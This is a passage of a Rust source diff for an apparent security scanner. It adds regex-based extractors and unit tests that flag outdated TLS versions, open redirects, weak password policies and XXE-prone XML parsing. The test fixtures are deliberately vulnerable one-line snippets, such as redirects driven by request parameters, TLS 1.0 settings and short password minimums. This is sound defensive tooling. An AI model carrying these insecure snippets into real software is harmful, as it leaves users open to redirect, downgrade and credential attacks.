    let claims = extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");

    assert!(claims.is_empty());
}

#[test]
fn test_concept_path_structure() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        cfg := &tls.Config{MinVersion: tls.VersionTLS10}
    "#;

    let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");

    assert_eq!(claims.len(), 1);
    assert!(claims[0].concept_path.contains("tls/min_version"));
}

// ===== Phase 8.4: Semantic TLS Version Detection Tests =====

#[test]
fn test_semantic_const_rust() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"const TLS_MIN_VERSION: &str = "1.0";"#;

    let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/config.rs");

    assert!(!claims.is_empty());
    assert!(claims.iter().any(|c| c.description.contains("Semantic")));
}

#[test]
fn test_semantic_let_js() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"let sslVersion = "TLSv1";"#;

    let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "config.js");

    assert!(!claims.is_empty());
    assert!(claims.iter().any(|c| c.description.contains("Semantic")));
}

#[test]
fn test_semantic_assignment_python() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"TLS_MINIMUM_VERSION = "1.1""#;

    let claims = extractor.extract(&["python".to_string()], content, Language::Python, "config.py");

    assert!(!claims.is_empty());
    assert!(claims.iter().any(|c| c.description.contains("Semantic")));
}

#[test]
fn test_semantic_ssl_version() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"const SSL_VERSION = "SSLv3";"#;

    let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/ssl.rs");

    assert!(!claims.is_empty());
}

#[test]
fn test_env_tls_version() {
    let extractor = TlsVersionExtractor::new();
    let content = "TLS_MIN_VERSION=1.0";

    let claims = extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env");

    assert!(!claims.is_empty());
    assert!(claims.iter().any(|c| c.description.contains("Environment variable")));
}

#[test]
fn test_env_export_ssl() {
    let extractor = TlsVersionExtractor::new();
    let content = "export SSL_VERSION=TLSv1";

    let claims =
        extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env.production");

    assert!(!claims.is_empty());
}

#[test]
fn test_terraform_min_tls_version() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"min_tls_version = "TLS1_0""#;

    let claims =
        extractor.extract(&["terraform".to_string()], content, Language::Terraform, "main.tf");

    assert!(!claims.is_empty());
    assert!(claims.iter().any(|c| c.description.contains("Terraform")));
}

#[test]
fn test_terraform_ssl_version() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"ssl_minimum_protocol_version = "TLSv1""#;

    let claims =
        extractor.extract(&["terraform".to_string()], content, Language::Terraform, "variables.tf");

    assert!(!claims.is_empty());
}

#[test]
fn test_k8s_min_tls_version() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        apiVersion: v1
        kind: Config
        spec:
          minTLSVersion: VersionTLS10
    "#;

    let claims =
        extractor.extract(&["k8s".to_string()], content, Language::Yaml, "deployment.yaml");

    assert!(!claims.is_empty());
    assert!(claims.iter().any(|c| c.description.contains("Kubernetes")));
}

#[test]
fn test_k8s_tls_min_version_camel() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"tlsMinVersion: "1.0""#;

    let claims = extractor.extract(&["k8s".to_string()], content, Language::Yaml, "ingress.yaml");

    assert!(!claims.is_empty());
}

#[test]
fn test_no_false_positive_semantic_tls12() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"const TLS_MIN_VERSION = "1.2";"#;

    let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/config.rs");

    // TLS 1.2 is safe, should not match semantic pattern
    assert!(claims.is_empty());
}

#[test]
fn test_no_false_positive_env_tls13() {
    let extractor = TlsVersionExtractor::new();
    let content = "TLS_VERSION=1.3";

    let claims = extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env");

    // TLS 1.3 is safe, should not match
    assert!(claims.is_empty());
}

#[test]
fn test_no_false_positive_terraform_tls12() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"min_tls_version = "TLS1_2""#;

    let claims =
        extractor.extract(&["terraform".to_string()], content, Language::Terraform, "main.tf");

    // TLS 1.2 is safe
    assert!(claims.is_empty());
}

#[test]
fn test_no_false_positive_k8s_tls12() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"minTLSVersion: VersionTLS12"#;

    let claims =
        extractor.extract(&["k8s".to_string()], content, Language::Yaml, "deployment.yaml");

    // TLS 1.2 is safe
    assert!(claims.is_empty());
}
301
applications/aphoria/src/extractors/unvalidated_redirects.rs
Normal file
@@ -0,0 +1,301 @@
//! Unvalidated redirects vulnerability extractor.
//!
//! Detects patterns where HTTP redirects use user-controlled input
//! without proper validation, which can lead to open redirect attacks.

use regex::Regex;
use stemedb_core::types::ObjectValue;

use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};

/// Extractor for unvalidated redirect vulnerabilities.
///
/// Detects patterns indicating unsafe redirect handling:
/// - redirect() with user-controlled URLs
/// - window.location assignment with user input
/// - URL parameters named redirect/return/next/goto
pub struct UnvalidatedRedirectsExtractor {
    // Python patterns
    python_redirect: Regex,
    python_flask_redirect: Regex,

    // JavaScript/TypeScript patterns
    js_redirect: Regex,
    js_location: Regex,

    // Go patterns
    go_redirect: Regex,

    // Universal URL parameter patterns
    url_param: Regex,
}

impl Default for UnvalidatedRedirectsExtractor {
    fn default() -> Self {
        Self::new()
    }
}

impl UnvalidatedRedirectsExtractor {
    /// Create a new unvalidated redirects extractor with compiled regexes.
    ///
    /// # Panics
    /// Panics if any regex pattern is invalid (programmer error).
    #[allow(clippy::expect_used)]
    pub fn new() -> Self {
        Self {
            // Python: redirect with user input
            python_redirect: Regex::new(
                r#"(?:redirect|HttpResponseRedirect)\s*\(\s*(?:request\.(?:GET|POST|args)|url|next|return_url)"#,
            )
            .expect("valid regex"),
            python_flask_redirect: Regex::new(
                r#"redirect\s*\(\s*request\.(?:args|form)\.get\s*\("#,
            )
            .expect("valid regex"),

            // JavaScript: redirect with user input
            js_redirect: Regex::new(
                r#"res\.redirect\s*\(\s*(?:req\.(?:query|params|body)\.|url|next)"#,
            )
            .expect("valid regex"),
            js_location: Regex::new(
                r#"(?:window\.)?location(?:\.href)?\s*=\s*(?:url|params|query|req\.)"#,
            )
            .expect("valid regex"),

            // Go: http.Redirect with user input
            go_redirect: Regex::new(
                r#"http\.Redirect\s*\([^,]*,\s*[^,]*,\s*(?:r\.|req\.|c\.)"#,
            )
            .expect("valid regex"),

            // Universal: dangerous URL parameter patterns
            url_param: Regex::new(
                r#"(?i)(?:redirect|return|next|goto|url|continue)(?:_url|Uri|_to)?\s*[:=]\s*(?:req\.|request\.|params\.)"#,
            )
            .expect("valid regex"),
        }
    }

    fn make_claim(
        path_segments: &[String],
        file: &str,
        line: usize,
        matched: &str,
        category: &str,
        description: &str,
    ) -> ExtractedClaim {
        build_claim(
            path_segments,
            &["http", "redirect", category],
            "redirect_source",
            ObjectValue::Text("user_controlled".to_string()),
            file,
            line,
            matched,
            0.85,
            description,
        )
    }
}

impl Extractor for UnvalidatedRedirectsExtractor {
    fn name(&self) -> &str {
        "unvalidated_redirects"
    }

    fn languages(&self) -> &[Language] {
        &[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
    }

    fn extract(
        &self,
        path_segments: &[String],
        content: &str,
        language: Language,
        file: &str,
    ) -> Vec<ExtractedClaim> {
        let mut claims = Vec::new();

        for (line_idx, line) in content.lines().enumerate() {
            let line_num = line_idx + 1;

            // Check for dangerous URL parameter patterns (all languages)
            if let Some(m) = self.url_param.find(line) {
                claims.push(Self::make_claim(
                    path_segments,
                    file,
                    line_num,
                    m.as_str(),
                    "url_parameter",
                    "Redirect URL from user-controlled parameter (open redirect risk)",
                ));
            }

            // Language-specific patterns
            match language {
                Language::Python => {
                    if let Some(m) = self.python_redirect.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "response",
                            "Redirect with user-controlled URL (open redirect risk)",
                        ));
                    }
                    if let Some(m) = self.python_flask_redirect.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "response",
                            "Flask redirect with request parameter (open redirect risk)",
                        ));
                    }
                }
                Language::JavaScript | Language::TypeScript => {
                    if let Some(m) = self.js_redirect.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "response",
                            "res.redirect with user input (open redirect risk)",
                        ));
                    }
                    if let Some(m) = self.js_location.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "client_side",
                            "window.location assignment with user input (open redirect risk)",
                        ));
                    }
                }
                Language::Go => {
                    if let Some(m) = self.go_redirect.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "response",
                            "http.Redirect with user input (open redirect risk)",
                        ));
                    }
                }
                _ => {}
            }
        }

        claims
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_python_redirect() {
        let extractor = UnvalidatedRedirectsExtractor::new();
        let content = r#"
            return redirect(request.GET['next'])
        "#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "views.py");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].concept_path.contains("http/redirect"));
    }

    #[test]
    fn test_python_flask_redirect() {
        let extractor = UnvalidatedRedirectsExtractor::new();
        let content = r#"
            return redirect(request.form.get('destination'))
        "#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "app.py");

        // Should match the flask redirect pattern (redirect + request.form.get)
        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_js_redirect() {
        let extractor = UnvalidatedRedirectsExtractor::new();
        let content = r#"
            res.redirect(req.query.next);
        "#;

        let claims =
            extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_js_location() {
        let extractor = UnvalidatedRedirectsExtractor::new();
        let content = r#"
            window.location = url;
        "#;

        let claims =
            extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].description.contains("window.location"));
    }

    #[test]
    fn test_go_redirect() {
        let extractor = UnvalidatedRedirectsExtractor::new();
        let content = r#"
            http.Redirect(w, r, r.URL.Query().Get("next"), http.StatusFound)
        "#;

        let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_url_param_pattern() {
        let extractor = UnvalidatedRedirectsExtractor::new();
        let content = r#"
            redirect_url = request.args.get("redirect")
        "#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "handler.py");
|
||||
|
||||
// Should match the url_param pattern (redirect_url = request.)
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_static_redirect() {
|
||||
let extractor = UnvalidatedRedirectsExtractor::new();
|
||||
// Safe: static redirect URL
|
||||
let content = r#"
|
||||
res.redirect('/login');
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
}
|
||||
344
applications/aphoria/src/extractors/weak_password.rs
Normal file
@ -0,0 +1,344 @@
|
||||
//! Weak password requirements extractor.
|
||||
//!
|
||||
//! Detects patterns where password policies are too weak,
|
||||
//! such as minimum length < 8, bcrypt cost < 10, or missing complexity requirements.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for weak password requirement configurations.
|
||||
///
|
||||
/// Detects patterns indicating insufficient password policies:
|
||||
/// - Minimum password length < 8 characters
|
||||
/// - Bcrypt cost/rounds < 10
|
||||
/// - Complexity requirements disabled
|
||||
pub struct WeakPasswordExtractor {
|
||||
// Minimum length too short (< 8)
|
||||
min_length_weak: Regex,
|
||||
min_length_config: Regex,
|
||||
|
||||
// Bcrypt cost too low (< 10)
|
||||
bcrypt_weak: Regex,
|
||||
|
||||
// Simple length check in code
|
||||
simple_check: Regex,
|
||||
|
||||
// Special chars not required
|
||||
no_special: Regex,
|
||||
no_uppercase: Regex,
|
||||
no_number: Regex,
|
||||
}
|
||||
|
||||
impl Default for WeakPasswordExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl WeakPasswordExtractor {
|
||||
/// Create a new weak password extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Minimum length too short (< 8) in various config formats
|
||||
min_length_weak: Regex::new(
|
||||
r#"(?i)(?:min[_-]?(?:password[_-]?)?length|password[_-]?min(?:[_-]?length)?)\s*[:=]\s*[1-7](?:\D|$)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
min_length_config: Regex::new(
|
||||
r#"(?i)["']?(?:minLength|min_length|minimumLength)["']?\s*[:=]\s*[1-7](?:\D|$)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Bcrypt cost too low (< 10)
|
||||
bcrypt_weak: Regex::new(
|
||||
r#"(?i)bcrypt.*(?:cost|rounds)\s*[:=]\s*[1-9](?:\D|$)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Simple length check in code (checking for < 8)
|
||||
simple_check: Regex::new(
|
||||
r#"len\s*\(\s*password\s*\)\s*(?:>=\s*[1-7]|>\s*[0-6])(?:\D|$)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Complexity requirements disabled
|
||||
no_special: Regex::new(
|
||||
r#"(?i)require[_-]?(?:special|symbol)[_-]?(?:char)?s?\s*[:=]\s*(?:false|no|0)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
no_uppercase: Regex::new(
|
||||
r#"(?i)require[_-]?(?:upper|uppercase)[_-]?(?:case)?\s*[:=]\s*(?:false|no|0)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
no_number: Regex::new(
|
||||
r#"(?i)require[_-]?(?:number|digit)s?\s*[:=]\s*(?:false|no|0)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
category: &str,
|
||||
value: ObjectValue,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["auth", "password", "policy", category],
|
||||
"requirement_strength",
|
||||
value,
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
0.9,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for WeakPasswordExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"weak_password"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[
|
||||
Language::Python,
|
||||
Language::JavaScript,
|
||||
Language::TypeScript,
|
||||
Language::Go,
|
||||
Language::Rust,
|
||||
Language::Yaml,
|
||||
Language::Json,
|
||||
Language::Toml,
|
||||
]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
_language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
// Check for weak minimum length
|
||||
if let Some(m) = self.min_length_weak.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"min_length",
|
||||
ObjectValue::Text("weak".to_string()),
|
||||
"Minimum password length < 8 characters (should be at least 8)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.min_length_config.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"min_length",
|
||||
ObjectValue::Text("weak".to_string()),
|
||||
"Minimum password length < 8 characters (should be at least 8)",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for weak bcrypt cost
|
||||
if let Some(m) = self.bcrypt_weak.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"hash_cost",
|
||||
ObjectValue::Text("weak".to_string()),
|
||||
"Password hashing cost/rounds < 10 (should be at least 10 for bcrypt)",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for simple length validation
|
||||
if let Some(m) = self.simple_check.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"validation",
|
||||
ObjectValue::Text("weak".to_string()),
|
||||
"Password validation allows < 8 characters",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for disabled complexity requirements
|
||||
if let Some(m) = self.no_special.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"complexity",
|
||||
ObjectValue::Boolean(false),
|
||||
"Special character requirement disabled",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.no_uppercase.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"complexity",
|
||||
ObjectValue::Boolean(false),
|
||||
"Uppercase requirement disabled",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.no_number.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"complexity",
|
||||
ObjectValue::Boolean(false),
|
||||
"Number/digit requirement disabled",
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_weak_min_length_yaml() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
password_min: 6
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
|
||||
|
||||
// Should match min_length_weak pattern
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("auth/password/policy"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_weak_min_length_json() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
"minLength": 4
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Json, "config.json");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_weak_bcrypt_cost() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
bcrypt_cost = 8
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("cost/rounds"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_simple_length_check() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
if len(password) >= 6:
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "auth.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_special_chars() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
require_special_chars: false
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("Special character"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_uppercase() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
require_uppercase = false
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_strong() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
// Strong: min length >= 8
|
||||
let content = r#"
|
||||
password_min_length: 12
|
||||
bcrypt_cost: 12
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_boundary_value_8() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
// Boundary: exactly 8 should be OK
|
||||
let content = r#"
|
||||
password_min_length: 8
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
}
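The patterns in this file encode the `< 8` threshold as a digit class (`[1-7]` followed by a non-digit). As an alternative sketch, and not what the extractor does, the value can be parsed and compared numerically, which also covers `0` and multi-digit values. The helper name `weak_min_length` and its key heuristics are assumptions made for illustration; it uses only the standard library.

```rust
/// Hypothetical helper (not part of the extractor): returns the configured
/// minimum length when it is below `threshold`.
fn weak_min_length(line: &str, threshold: u32) -> Option<u32> {
    // Split `key: value` or `key = value` at the first separator.
    let (key, value) = line.split_once(|c: char| c == ':' || c == '=')?;
    let key = key
        .trim()
        .trim_matches(|c: char| c == '"' || c == '\'')
        .to_ascii_lowercase();
    // Only consider keys that look like a minimum-length setting.
    if !key.contains("min") || !(key.contains("length") || key.contains("password")) {
        return None;
    }
    // Take the leading run of digits so trailing commas or comments are ignored.
    let digits: String = value
        .trim_start()
        .chars()
        .take_while(|c| c.is_ascii_digit())
        .collect();
    let n: u32 = digits.parse().ok()?;
    (n < threshold).then_some(n)
}
```

Called with a threshold of 8, this flags `password_min: 6` and `"minLength": 4`, and leaves `password_min_length: 8` and `bcrypt_cost = 8` alone. The trade-off is that a numeric comparison needs a key heuristic of its own, whereas the regex carries both the key and the threshold in one pattern.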
|
||||
432
applications/aphoria/src/extractors/xxe.rs
Normal file
@ -0,0 +1,432 @@
|
||||
//! XML External Entity (XXE) vulnerability extractor.
|
||||
//!
|
||||
//! Detects patterns where XML parsers are used without disabling external entity
|
||||
//! processing, which can lead to data exfiltration, SSRF, or denial of service.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for XXE vulnerabilities.
|
||||
///
|
||||
/// Detects patterns indicating potentially unsafe XML parsing:
|
||||
/// - Python: lxml, xml.etree, xml.dom.minidom, xml.sax
|
||||
/// - JavaScript: xml2js, libxmljs
|
||||
/// - Go: encoding/xml
|
||||
/// - Java-style patterns (polyglot detection)
|
||||
/// - DTD entity declarations
|
||||
pub struct XxeExtractor {
|
||||
// Python patterns
|
||||
python_lxml: Regex,
|
||||
python_etree: Regex,
|
||||
python_minidom: Regex,
|
||||
python_sax: Regex,
|
||||
|
||||
// JavaScript patterns
|
||||
js_xml2js: Regex,
|
||||
js_libxmljs: Regex,
|
||||
|
||||
// Go patterns
|
||||
go_xml: Regex,
|
||||
|
||||
// Java-style patterns
|
||||
java_xxe: Regex,
|
||||
|
||||
// DTD entity declaration
|
||||
entity_decl: Regex,
|
||||
}
|
||||
|
||||
impl Default for XxeExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl XxeExtractor {
|
||||
/// Create a new XXE extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Python: lxml/etree parse
|
||||
python_lxml: Regex::new(r#"(?:etree|lxml)\.(?:parse|fromstring|XML)\s*\("#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Python: xml.etree.ElementTree
|
||||
python_etree: Regex::new(
|
||||
r#"(?:xml\.etree\.ElementTree|ET)\.(?:parse|fromstring|XMLParser)\s*\("#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Python: xml.dom.minidom
|
||||
python_minidom: Regex::new(r#"xml\.dom\.minidom\.(?:parse|parseString)\s*\("#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Python: xml.sax
|
||||
python_sax: Regex::new(r#"xml\.sax\.(?:parse|parseString|make_parser)\s*\("#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// JavaScript: xml2js
|
||||
js_xml2js: Regex::new(r#"xml2js\.(?:parseString|Parser)\s*\("#).expect("valid regex"),
|
||||
|
||||
// JavaScript: libxmljs
|
||||
js_libxmljs: Regex::new(r#"libxmljs\.parseXml\s*\("#).expect("valid regex"),
|
||||
|
||||
// Go: encoding/xml
|
||||
go_xml: Regex::new(r#"xml\.(?:Unmarshal|NewDecoder)\s*\("#).expect("valid regex"),
|
||||
|
||||
// Java-style patterns (polyglot detection in config files, etc.)
|
||||
java_xxe: Regex::new(
|
||||
r#"(?:DocumentBuilder|SAXParser|XMLReader|TransformerFactory)(?:Factory)?\.new"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// DTD entity declaration (dangerous in untrusted XML)
|
||||
entity_decl: Regex::new(r#"<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC)"#)
|
||||
.expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
parser: &str,
|
||||
confidence: f32,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["xml", "parsing"],
|
||||
"parser_config",
|
||||
ObjectValue::Text(parser.to_string()),
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
confidence,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for XxeExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"xxe"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
// Check for DTD entity declarations (high risk in any context)
|
||||
if let Some(m) = self.entity_decl.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"dtd_entity",
|
||||
0.95,
|
||||
"DTD SYSTEM/PUBLIC entity declaration (XXE attack vector)",
|
||||
));
|
||||
}
|
||||
|
||||
match language {
|
||||
Language::Python => {
|
||||
// lxml/etree (can be safe with proper configuration)
|
||||
if let Some(m) = self.python_lxml.find(line) {
|
||||
// Lower confidence if defusedxml is imported or resolve_entities=False
|
||||
let confidence = if content.contains("defusedxml")
|
||||
|| line.contains("resolve_entities=False")
|
||||
{
|
||||
0.5
|
||||
} else {
|
||||
0.85
|
||||
};
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"lxml",
|
||||
confidence,
|
||||
"lxml XML parsing may be vulnerable to XXE without proper config",
|
||||
));
|
||||
}
|
||||
|
||||
// xml.etree.ElementTree
|
||||
if let Some(m) = self.python_etree.find(line) {
|
||||
// Python 3.8+ has some protections, but external entities still a concern
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"elementtree",
|
||||
0.75,
|
||||
"xml.etree.ElementTree may allow external entity expansion",
|
||||
));
|
||||
}
|
||||
|
||||
// xml.dom.minidom (per the Python docs it does not expand external entities,
// but it is exposed to entity-expansion DoS on older Expat builds)
if let Some(m) = self.python_minidom.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"minidom",
0.85,
"xml.dom.minidom parsing of untrusted XML - verify entity expansion limits",
|
||||
));
|
||||
}
|
||||
|
||||
// xml.sax (needs feature flags to be safe)
|
||||
if let Some(m) = self.python_sax.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"sax",
|
||||
0.85,
|
||||
"xml.sax is vulnerable to XXE without feature_external_ges=False",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::JavaScript | Language::TypeScript => {
|
||||
// xml2js (generally safer, but can be misconfigured)
|
||||
if let Some(m) = self.js_xml2js.find(line) {
|
||||
